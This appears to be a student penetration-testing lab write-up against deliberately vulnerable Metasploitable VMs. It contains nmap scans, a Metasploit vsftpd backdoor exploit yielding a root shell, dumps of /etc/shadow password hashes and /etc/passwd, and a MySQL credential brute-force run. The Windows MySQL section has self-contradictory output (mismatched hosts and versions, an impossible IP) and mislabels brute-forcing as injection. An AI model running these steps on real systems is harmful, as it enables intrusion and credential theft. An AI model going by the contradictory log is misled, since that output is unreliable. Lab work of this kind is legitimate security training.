Raiding "Metasploitable"
This assignment is based on "metasploitable" machines, purposely built with vulnerabilities, and the Metasploit framework as the means to hack into the machines, aided by NMAP, the protocols, and their respective programs, to verify that the machines have been compromised.
The home lab is set up in VirtualBox on machines with no connection to the internet, thus with no threat to the network.
This has been done by disabling the network cards of the host machine and setting up the following machines - the attack machine, Kali Linux, and the victim machines, "Metasploitable" 2 Linux Ubuntu 2.6.X, "Metasploitable" 3 Windows Server 2008 and "Metasploitable" 3 Linux 14.04 - using the VirtualBox Host-Only Ethernet Adapter to make sure they could connect to each other.
Note: Make sure the VirtualBox Host-Only Ethernet Adapter is the same on all the different virtual machines.These settings can be verified by pinging all the hosts from one machine to the other or, directly, doing the first part of this home lab assignment - scanning the network.
Scanning
Scan the entire network with a Wireshark packet capture running.
Different scans can be performed, for example, one with the default parameters and another explicitly outputing the OS versions of each port. The parameters can be adjusted further, as using the option -T0 which would scan each port individually with five minutes of difference between different ports to avoid being detected as an active scan, but that would be time consuming.
Instead, the NMAP scan will first be performed with the default values, then with OS discovery - which will allow the attacker to see which version of the service is being used and finally, another scan will be performed, having the NMAP flag for a stealth attack. These will be shown separately, but could very well be done together by adding the flag in the command.
NMAP Default Scan
┌──(kali㉿kali)-[~]
└─$ nmap 192.168.56.100/24 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 10:26 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.012s latency).
Not shown: 980 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
514/tcp open shell
1099/tcp open rmiregistry
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
Nmap scan report for 192.168.56.105
Host is up (0.014s latency).
Not shown: 981 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
7676/tcp open imqbrokerd
8080/tcp open http-proxy
8181/tcp open intermapper
8383/tcp open m2mservices
9200/tcp open wap-wsp
49152/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Nmap scan report for 192.168.56.106
Host is up (0.011s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
445/tcp open microsoft-ds
631/tcp open ipp
3306/tcp open mysql
8080/tcp open http-proxy
Nmap done: 256 IP addresses (3 hosts up) scanned in 23.14 secondsNMAP Scan with OS Discovery
Metasploitable 2
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.56.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 10:44 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.023s latency).
Not shown: 978 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
|_ssl-date: 2021-09-14T16:04:27+00:00; -1d22h43m35s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 40753/tcp mountd
| 100005 1,2,3 50603/udp mountd
| 100021 1,3,4 54257/udp nlockmgr
| 100021 1,3,4 57277/tcp nlockmgr
| 100024 1 47011/tcp status
|_ 100024 1 52545/udp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell Netkit rshd
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 10
| Capabilities flags: 43564
| Some Capabilities: LongColumnFlag, ConnectWithDatabase, SwitchToSSLAfterHandshake, SupportsTransactions, Speaks41ProtocolNew, Support41Auth, SupportsCompression
| Status: Autocommit
|_ Salt: YKM!X{#7.|J;*]v[E&.R
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1d21h23m35s, deviation: 2h18m34s, median: -1d22h43m35s
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2021-09-14T12:03:10-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)Windows Server 2008
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.56.105
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 10:48 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.105
Host is up (0.019s latency).
Not shown: 978 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.1 (protocol 2.0)
| ssh-hostkey:
| 2048 b0:04:32:f0:fd:4b:a4:24:1b:ab:ff:c6:94:47:0d:a4 (RSA)
|_ 521 2e:56:c1:dc:51:c9:44:28:f1:4b:fc:83:73:9d:74:75 (ECDSA)
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
3306/tcp open mysql MySQL 5.5.20-log
| mysql-info:
| Protocol: 10
| Version: 5.5.20-log
| Thread ID: 7
| Capabilities flags: 63487
| Some Capabilities: IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, ODBCClient, IgnoreSigpipes, InteractiveClient, LongPassword, LongColumnFlag, ConnectWithDatabase, FoundRows, SupportsTransactions, Speaks41ProtocolNew, Support41Auth, Speaks41ProtocolOld, SupportsCompression, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: B/_sFAQV;ekiO0>)Q;sU
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: VAGRANT-2008R2
| NetBIOS_Domain_Name: VAGRANT-2008R2
| NetBIOS_Computer_Name: VAGRANT-2008R2
| DNS_Domain_Name: vagrant-2008R2
| DNS_Computer_Name: vagrant-2008R2
| Product_Version: 6.1.7601
|_ System_Time: 2021-09-16T14:47:07+00:00
| ssl-cert: Subject: commonName=vagrant-2008R2
| Not valid before: 2021-08-29T15:37:48
|_Not valid after: 2022-02-28T15:37:48
|_ssl-date: 2021-09-16T14:47:54+00:00; +18s from scanner time.
4848/tcp open ssl/http Oracle Glassfish Application Server
|_http-server-header: GlassFish Server Open Source Edition 4.0
|_http-title: Login
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2013-05-15T05:33:38
|_Not valid after: 2023-05-13T05:33:38
|_ssl-date: 2021-09-16T14:47:54+00:00; +18s from scanner time.
7676/tcp open java-message-service Java Message Service 301
8080/tcp open http Sun GlassFish Open Source Edition 4.0
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: GlassFish Server Open Source Edition 4.0
|_http-title: GlassFish Server - Server Running
8181/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE
|_http-server-header: GlassFish Server Open Source Edition 4.0
|_http-title: GlassFish Server - Server Running
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2013-05-15T05:33:38
|_Not valid after: 2023-05-13T05:33:38
|_ssl-date: 2021-09-16T14:47:54+00:00; +18s from scanner time.
8383/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: 503 Service Unavailable
| ssl-cert: Subject: commonName=Desktop Central/organizationName=Zoho Corporation/stateOrProvinceName=CA/countryName=US
| Not valid before: 2010-09-08T12:24:44
|_Not valid after: 2020-09-05T12:24:44
|_ssl-date: TLS randomness does not represent time
9200/tcp open wap-wsp?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Content-Type: text/plain; charset=UTF-8
| Content-Length: 80
| handler found for uri [/nice%20ports%2C/Tri%6Eity.txt%2ebak] and method [GET]
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: application/json; charset=UTF-8
| Content-Length: 306
| "status" : 200,
| "name" : "Cypher",
| "version" : {
| "number" : "1.1.1",
| "build_hash" : "f1585f096d3f3985e73456debdc1a0745f512bbc",
| "build_timestamp" : "2014-04-16T14:27:12Z",
| "build_snapshot" : false,
| "lucene_version" : "4.7"
| "tagline" : "You Know, for Search"
| HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/plain; charset=UTF-8
| Content-Length: 0
| RTSPRequest, SIPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/plain; charset=UTF-8
|_ Content-Length: 0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open java-rmi Java RMI
49159/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9200-TCP:V=7.91%I=7%D=9/16%Time=61435874%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,189,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\x20application/js
SF:on;\x20charset=UTF-8\r\nContent-Length:\x20306\r\n\r\n{\r\n\x20\x20\"st
SF:atus\"\x20:\x20200,\r\n\x20\x20\"name\"\x20:\x20\"Cypher\",\r\n\x20\x20
SF:\"version\"\x20:\x20{\r\n\x20\x20\x20\x20\"number\"\x20:\x20\"1\.1\.1\"
SF:,\r\n\x20\x20\x20\x20\"build_hash\"\x20:\x20\"f1585f096d3f3985e73456deb
SF:dc1a0745f512bbc\",\r\n\x20\x20\x20\x20\"build_timestamp\"\x20:\x20\"201
SF:4-04-16T14:27:12Z\",\r\n\x20\x20\x20\x20\"build_snapshot\"\x20:\x20fals
SF:e,\r\n\x20\x20\x20\x20\"lucene_version\"\x20:\x20\"4\.7\"\r\n\x20\x20},
SF:\r\n\x20\x20\"tagline\"\x20:\x20\"You\x20Know,\x20for\x20Search\"\r\n}\
SF:n")%r(HTTPOptions,4F,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\x20text/p
SF:lain;\x20charset=UTF-8\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,
SF:4F,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/plain;\x20charset=U
SF:TF-8\r\nContent-Length:\x200\r\n\r\n")%r(FourOhFourRequest,A9,"HTTP/1\.
SF:0\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=U
SF:TF-8\r\nContent-Length:\x2080\r\n\r\nNo\x20handler\x20found\x20for\x20u
SF:ri\x20\[/nice%20ports%2C/Tri%6Eity\.txt%2ebak\]\x20and\x20method\x20\[G
SF:ET\]")%r(SIPOptions,4F,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text
SF:/plain;\x20charset=UTF-8\r\nContent-Length:\x200\r\n\r\n");
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h00m18s, deviation: 2h38m45s, median: 17s
|_nbstat: NetBIOS name: VAGRANT-2008R2, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b8:13:22 (Oracle VirtualBox virtual NIC)
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: vagrant-2008R2
| NetBIOS computer name: VAGRANT-2008R2\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-09-16T07:47:06-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-16T14:47:14
|_ start_date: 2021-09-14T15:41:37Linux 14.04
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.56.106
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-17 10:55 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.106
Host is up (0.013s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 2b:2e:1f:a4:54:26:87:76:12:26:59:58:0d:da:3b:04 (DSA)
| 2048 c9:ac:70:ef:f8:de:8b:a3:a3:44:ab:3d:32:0a:5c:6a (RSA)
| 256 c0:49:cc:18:7b:27:a4:07:0d:2a:0d:bb:42:4c:36:17 (ECDSA)
|_ 256 a0:76:f3:76:f8:f0:70:4d:09:ca:e1:10:fd:a9:cc:0a (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2020-10-29 19:37 chat/
| - 2011-07-27 20:17 drupal/
| 1.7K 2020-10-29 19:37 payroll_app.php
| - 2013-04-08 12:06 phpmyadmin/
|_
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Index of /
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
8080/tcp open http Jetty 8.1.7.v20120910
|_http-server-header: Jetty(8.1.7.v20120910)
|_http-title: Error 404 - Not Found
Service Info: Host: METASPLOITABLE3-UB1404; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 19s, deviation: 3s, median: 17s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: metasploitable3-ub1404
| NetBIOS computer name: METASPLOITABLE3-UB1404\x00
| Domain name: \x00
| FQDN: metasploitable3-ub1404
|_ System time: 2021-09-16T14:47:10+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-16T14:47:15
|_ start_date: N/A
Post-scan script results:
| clock-skew:
| 1h00m18s:
| 192.168.56.105
|_ 192.168.56.106
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (3 hosts up) scanned in 242.59 secondsNMAP Stealth Scan
Metasploitable 2
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS 192.168.56.101 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-17 11:21 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.0034s latency).
Not shown: 977 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 4.60 secondsWindows Server 2008
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS 192.168.56.105
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-17 11:25 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.105
Host is up (0.0030s latency).
Not shown: 982 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
4848/tcp open appserv-http
7676/tcp open imqbrokerd
8080/tcp open http-proxy
8181/tcp open intermapper
8383/tcp open m2mservices
9200/tcp open wap-wsp
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 4.96 secondsLinux 14.04
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS 192.168.56.106
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-17 11:23 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.106
Host is up (0.0025s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
445/tcp open microsoft-ds
631/tcp open ipp
3306/tcp open mysql
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 4.92 secondsGaining Access
Breach all the machines with a Wireshark packet capture running.
Metasploitable 2
There is an interesting version of FTP running on port 21. Looking at the output from the scan, it looks like even attempting to connect to the service as anonymous may bypass any check for credentials. However, for this assignment, Metasploit will be the framework used to gain access, and then gain persistance to the vulnerable machines. In this case, once within the Metasploit framework, a quick search on the version of FTP running comes up with a nice exploit.
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD BCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoorChecking the explicit version, the exploit listed in Metasploit is the same as the service running on the port. Select the exploit and launch the attack after showing the options and setting the target host.
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s)
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.56.101:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.56.101:21 - USER: 331 Please specify the password.
[+] 192.168.56.101:21 - Backdoor service has been spawned, handling...
[+] 192.168.56.101:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.56.101:6200) at 2021-09-06 05:13:18 -0400
whoami
root
hostname
metasploitable
cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/falseThe exploit opens a command shell as superuser root, and allows to output the content of the files where the user and password credentials are stored. The two files printed on the command line are /etc/shadow and /etc/passwd , which are two text files that contain information for all accounts of the machine, owned by superuser root.
The first file, /etc/shadow contins the user passwords, encrypted with the MD5 hashing algorithm ( it starts with $1$). Then comes the salt value, /avpfBJ1 (before the next $ sign), while the third is the hash value of the password and the salt.
In the second file, /etc/passwd, the first line describes the root user, followed by system and normal user accounts. This file displays in the following order user information:
Username
Password
UID - User ID
GID - Group ID
GECOS - the full name of the user, including the full name or application name, room number, work phone number, home phone number and other contact information.
Home directory
Login Shell
It is important to note that all the paths specified, e.g. login shell, are absolute paths.
This machine has been breached.
Windows Server 2008
The second machine is a Windows 2008 Server, with a lot of ports open. However, some of this ports have unknown services open. Using the flag -A for executing the scan, there is a lot of new information on each port, including what version of each service is running. A first step is to see if the mysql database is vulnerable to an injection attack, just like for the Metasploitable 2 machine using the same exploit but remember to change the RHOSTS parameter before running the exploit.
msf6 auxiliary(scanner/mysql/mysql_login) > options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.56.105
RHOSTS => 192.168.56.101
msf6 auxiliary(scanner/mysql/mysql_login) > run
[+] 192.168.56.105:3306 - 192.168.56.105:3306 - Found remote MySQL version 5.0.51a
[!] 192.168.56.105:3306 - No active DB -- Credential data will not be saved!
[+] 192.168.56.105:3306 - 192.168.56.1015:3306 - Success: 'root:'
[*] 192.168.56.105:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedFor the next step, Gaining Persistence, use the credentials dumped during this exploit to gain persistence access - username root with no password - those are the credentials that successfully connected to the remote MySQL server from the machine using the auxiliary module that tested the credentials against the login form.
Linux 14.04
This Ubuntu machine also has a handful of ports open. The first one is the FTP port, which delivers the service with ProFTP and is found as an exploit within the Metasploitable Framework. This exploit will, hopefully, allow us to enter the machine and see what types of permissions the shell has opened with, as well as investigate what other users, especially superusers are within the machine.
msf6 > search proftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
